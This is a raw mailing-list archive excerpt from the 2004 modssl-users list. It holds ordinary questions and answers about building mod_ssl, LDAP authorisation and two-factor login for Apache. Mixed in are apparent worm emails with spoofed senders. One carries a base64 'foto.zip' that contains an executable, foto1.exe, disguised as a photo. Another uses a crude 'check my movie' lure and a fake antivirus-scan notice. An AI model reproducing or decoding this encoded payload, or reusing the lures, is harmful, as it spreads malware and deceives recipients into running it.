AAD/f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//fwAA/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//38AAP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9/AAA=

----------dvfgqhqfxyjyswxeptrc
Content-Type: application/octet-stream; name="MP3.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="MP3.zip"



----------dvfgqhqfxyjyswxeptrc--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 16 14:42:56 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7B17FA8A69; Thu, 16 Sep 2004 14:42:56 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mailout04.sul.t-online.com (mailout04.sul.t-online.com [194.25.134.18])
	by master.modssl.org (Postfix) with ESMTP id E31B0A8960
	for ; Thu, 16 Sep 2004 14:42:49 +0200 (CEST)
Received: from fwd06.aul.t-online.de 
	by mailout04.sul.t-online.com with smtp 
	id 1C7vb4-0005Db-03; Thu, 16 Sep 2004 14:42:46 +0200
Received: from lagune (STgcp4ZO8eT1HkL208O2XXPAWnx6TanOH6KLQe1FIiEoknWw0zKS8R@[217.224.19.209]) by fmrl06.sul.t-online.com
	with esmtp id 1C7vay-1zOHeS0; Thu, 16 Sep 2004 14:42:40 +0200
From: =?US-ASCII?Q?Helke_Schroder?= 
To: 
Subject: AW: mod_ssl on sparc solaris
Date: Thu, 16 Sep 2004 14:44:55 +0200
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
In-Reply-To: <20040915095320.43737.qmail@web60703.mail.yahoo.com>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Importance: Normal
X-ID: STgcp4ZO8eT1HkL208O2XXPAWnx6TanOH6KLQe1FIiEoknWw0zKS8R@t-dialin.net
X-TOI-MSGID: 33c92d93-54fc-4e3b-ab58-9d41cef4c2b2
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?US-ASCII?Q?Helke_Schroder?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Matt,

thanks for your response.
I have done the configure and make-processes like you suggested
and at least all ssl-variables are there now
thanks
unfortunately the mod_authz_ldap is still not working
but I suppose this I have to find out at another place....

Regards, Helke

-----Ursprungliche Nachricht-----
Von: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]Im Auftrag von Matt Stevenson
Gesendet: Mittwoch, 15. September 2004 11:53
An: modssl-users@modssl.org
Betreff: Re: mod_ssl on sparc solaris


Hi,

I haven't used authz_ldap in a while but I believe the
following config should work. Also you should see
mod_so.c listed for a "httpd -l". 

./httpd -l
Compiled-in modules:
  http_core.c
  mod_so.c

openssl:
       CC=$(CC) ./config shared no-idea

modssl:
        ./configure \
--with-apache=$(COMP_DIR)/$(APACHE_DIR) \             
         --with-ssl=$(COMP_DIR)/$(OPENSSL_DIR) \
--with-mm=$(COMP_DIR)/$(MM_DIR) )
                                                      
                                                      
                                         
apache:
        ./configure --prefix=$(APACHE_PREFIX) \       
                      --enable-module=rewrite
--enable-module=ssl \
--enable-module=most \                 
--enable-shared=max  \
--enable-rule=SSL_EXPERIMENTAL \

Regards
Matt


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 20 23:40:40 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 16FECA8945; Mon, 20 Sep 2004 23:40:40 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from KINGKONG.com (66-205-231-2.idstelcom.net [66.205.231.2])
	by master.modssl.org (Postfix) with SMTP id 09AB8A893B
	for ; Mon, 20 Sep 2004 23:40:38 +0200 (CEST)
Date: Sat, 20 Sep 2003 17:40:33 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------njhbrolrnwlljnawsund"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------njhbrolrnwlljnawsund
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------njhbrolrnwlljnawsund
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

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
AA==

----------njhbrolrnwlljnawsund--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 22 21:21:18 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BFA71A8A7D; Wed, 22 Sep 2004 21:21:18 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from 195.27.176.156 (cable6-118.murray-ky.net [63.151.141.118])
	by master.modssl.org (Postfix) with SMTP id EAFD5A8A69
	for ; Wed, 22 Sep 2004 21:21:17 +0200 (CEST)
From: "rse" 
To: modssl-users@modssl.org
Subject: Fw: My Funny Ass
Date: 22 Sep 2004 12:21:14 +0000
MIME-Version: 1.0
X-Mailer: OstroSoft SMTP Component (5.1.1)
Content-Type: multipart/mixed; boundary="--NextMimePart"
Message-Id: <20040922192117.EAFD5A8A69@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----NextMimePart
Content-Type: multipart/alternative; boundary="--NextMimePartHTML"

----NextMimePartHTML
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit


----NextMimePartHTML
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable


when i saw my ass i slept 3 hours why?? check my ass sorry my movie
LOOOOOOOOL joke (^!^)
Bye
 
 
Engelschall.com servers automatically scanned for viruses using Norton AntiVirus-2004


----NextMimePartHTML--


----NextMimePart
Content-Type: image/gif; Name = "Nav2004.gif"
Content-Transfer-Encoding: Base64
Content-Disposition: attachment; FileName = "Nav2004.gif"

R0lGODlhkAA4AOYAAACAAP8AAP8PD/8fH/8vL/8/P/9PT/9fX/9vb/9/f/+Pj/+fn/+vr/+/v//P
z//f3//v7/////7+/vz8/Pv7+/j4+Pf39/Pz8/Hx8e/v7+7u7ufn5+bm5uXl5eLi4uHh4d/f397e
3t3d3dvb29ra2tnZ2djY2NfX19XV1dTU1NHR0c/Pz87Ozs3NzcnJycfHx8XFxcLCwsDAwL+/v7y8
vLu7u7a2tq+vr66urq2traioqKenp6ampqSkpKOjo5+fn56enpeXl5aWlpGRkY+Pj46Ojo2NjYiI
iIeHh4WFhYCAgH9/f3p6enR0dG9vb25ubmpqamdnZ19fX1lZWU9PT01NTUVFRURERENDQ0JCQkFB
QUBAQD8/Pz4+Pjw8PDk5OTMzMzIyMjAwMC8vLy4uLi0tLSsrKygoKCcnJyIiIiEhIR8fHx4eHhoa
GhgYGBUVFRQUFBMTExISEhAQEA8PDw0NDQwMDAoKCgkJCQYGBgEBAQAAAP///wAAAAAAAAAAACH5
BAEAAHwALAAAAACQADgAAAf/gBGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmIZJdkIRMXZJi0RomaWm
p5JLe24aM3tLEiMsKhoRLCYsJCxieywdFSgsLCgVFywewhioy8yUqq8vrytlY3ZME3tsbVVheHtg
QTpyZmZyOK5abHtDzYoZRDOEGT/xg/P1hCBL7YqqXXc8XmHZgyKLnhB74gDp0eHLHhEZ3tBx0QKO
Ghl7wuTY84XfoRt76OwZM4iLkyVcMggyiVLloDF7PCJS5WMPmVd3zERAsqfGHiuDtMQ8sSeKICt7
bOw5EmHPFpmFqKyI4GRPvCV0VK6REgGrVq6CsMaEWkgVDCh7cOrkScPpoC0x/0cUPZr0VdOnZAXV
y7CHSAQ6VAQ5ofM3MFXCEVaMUZWXkKoZH+q8urLnw8AUbgV52aNCxZ05KEq8uYNxX+bGgkBOtds1
JmvGGdasYIy6dTwlr2KkKbOniYXTT/acmeIjz5kzeXy4Mo23NpV9TaEzfh3TiV/aqDmwuBBBAwsO
FEwYmaEy16ANO4qUqKCiSBEVxb7bIlE7MUlB1KOH3XODzhKUr4BQH1kICECAA5A4QIAACDCywhou
RbCVIFKsISFYFf7AxYZr7MHFVAN6pEAAJAoAiQAkBqCAIg9OBYITXUEo4T5LyLgGdPuF6ECKJEJw
yQMKNDjIATzumGIDhDRQJP+PCSQCgkhp7cFVBmOMQQUXglBpJZaOjVXfiDwyYAkBJBZACJgBmIgi
iU0OkkCKaqa4IiIZzGCnnQJGkMENIGbJpyEg4FNbATwGIOQkRgZgJiEIBHBgBAakeAAhRJJoQAQO
DMBgiFClOACJA1SiZJmKoEkAIWSSOCenZI0awJskPkDIAgkksIAgDCBQQAEK+BgBrZUGMECtTT5A
7K0P8EgIj7LSWqusERhbawQMGFDArcS2KYizCUAbrQIH7IrAAt6i1iiJid46CKFpMvApjwLIym6h
jkbg6qLvBoCkvZ4KMu++rgZrprLrHrktvYpGoGwAUKU6MImTFoxwig3OW6j/mfcKEuycaEb8ryCu
8vgwiYR8HLLIgjCcokwQUBwBuyZKnOKuaybsQAOmNtCArBn/KqnGKar7Mb/0jsywzEgGO2wCBQiw
qMoKy8RA0BHAGgCC/lIMrasxE53wID0nS+KpEaQaALRDuzoAAxA0gCDBWZOI5NCClJtXsAhOrSrS
YMPdM8gzD5JvymPz7fWig8D9ssHzFoB1iINHm+Klcevb98qAk3r51xGce7Wrh6Yd+LKYV46k52P3
Wp/YnEe+uNybH314kqNTG/QCKYppeuacE04y3xDU7OnjeaE5wK5NG/y65bzL/vfsgrTMptW+Lg9w
7b7Lbn3dFheOWqQTkygk/90hb4449II4zC7Zu6OffcnK151AvlejJjzCZJPvN/bPn0tAqtranvsU
VjoBEgICdINKopZGLB75SH+lUxsE2tY2/tFrX+17HgFJJKYHoA5JDVgA1iBgNgxCxWqUG4TZxATB
33mNRzrD3gYLKEANmm1iSLIa/c7WmHkFMALBmlQLZRe8C2rQYueroQytBi+DMZFHEcsLDAthPAOW
bxALuN/NlsikQohOc4QAH6gWgDvYlbFQCKgeqzLRNluZkCwOYIAC3liIm7lRjWvMox73yMc+IgIA
gAykIAdJyEIa8pCITKQiF8nIRjqSkIIAgB8nyQxJRsCSlMxkJiyJSU16kv8SnIwkJgEJyk5agpT8
QGVeSBnKS6JSlah5pSklAUtD1HIQt1RELm0pyVYGUpQDkuUldgnMQxDTmLNE5iUjKUpWjvKXhRCm
M3vJyWrO8peDbGYznynLawpym9p0pSq/KU5wbrOXzBQnNYtZS2mu05XAdGY0rQlPYcKTEPKcZzyr
eU937pOd72RlOqfJz3viE5r5tGcuFRrQbKrznQfd5ze7iU1TUjSh6FxmPxnKS39uFJfeBOhHI1rP
kJZUnwYtJkhVKlJf0nOkKD1pSdfZzoJi9J8yJelNOerRnma0oAYlJy9XOk5yQlOfHlUnSBHqTaYW
1ZxKBWhRsZnOT1o1Eq0jvKpWG5HVrXr1j+d8pFjHStaympWsX02rWtfK1ra69a2WCAQAOw==



----NextMimePart--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 24 02:10:29 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id AA689A8A7D; Fri, 24 Sep 2004 02:10:29 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from adrastea.tiggee.com (ns5.dnsmadeeasy.com [63.219.151.12])
	by master.modssl.org (Postfix) with ESMTP id DB554A897C
	for ; Fri, 24 Sep 2004 02:10:24 +0200 (CEST)
Received: from DTALAPTOP02 (ACA7573D.ipt.aol.com [172.167.87.61]) (authenticated as dashley with LOGIN if spam please forward this message with this full header to abuse@dnsmadeeasy.com for ; Thu, 23 Sep 2004 20:12:53 -0400
From: "David T. Ashley" 
To: 
Subject: Private Tunnel/Key With Apache and IE?
Date: Thu, 23 Sep 2004 20:12:48 -0400
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1409
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David T. Ashley" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

Is there a way to load Apache and Internet Explorer with keys so that a
"private tunnel" is created automatically?

What I'm looking for is an arrangement where only a user who has keys that
I've given him can use a browser to connect to my server on Port 443.

(I'm aware of STUNNEL and similar solutions, but I'm looking for a solution
where only the browser and the server are involved.)

Thanks, Dave Ashley.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 24 02:12:43 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A2875A8A99; Fri, 24 Sep 2004 02:12:43 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from adrastea.tiggee.com (ns5.dnsmadeeasy.com [63.219.151.12])
	by master.modssl.org (Postfix) with ESMTP id EBE09A898B
	for ; Fri, 24 Sep 2004 02:12:42 +0200 (CEST)
Received: from DTALAPTOP02 (ACA7573D.ipt.aol.com [172.167.87.61]) (authenticated as dashley with LOGIN if spam please forward this message with this full header to abuse@dnsmadeeasy.com for ; Thu, 23 Sep 2004 20:15:14 -0400
From: "David T. Ashley" 
To: 
Subject: 2-Factor Security for Apache
Date: Thu, 23 Sep 2004 20:15:09 -0400
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1409
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David T. Ashley" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

Does anyone have any ideas for 2-factor security for Apache?

I looked into SecurIDs, but the license price is higher than I'm willing to
pay.

I was thinking one of the following:

a)Encryption using a key that must be acquired + a password, OR

b)Maybe there is a competitor to RSA Security that has a similar product for
a lot less?

Thanks and best regards, Dave Ashley.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 24 09:13:51 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
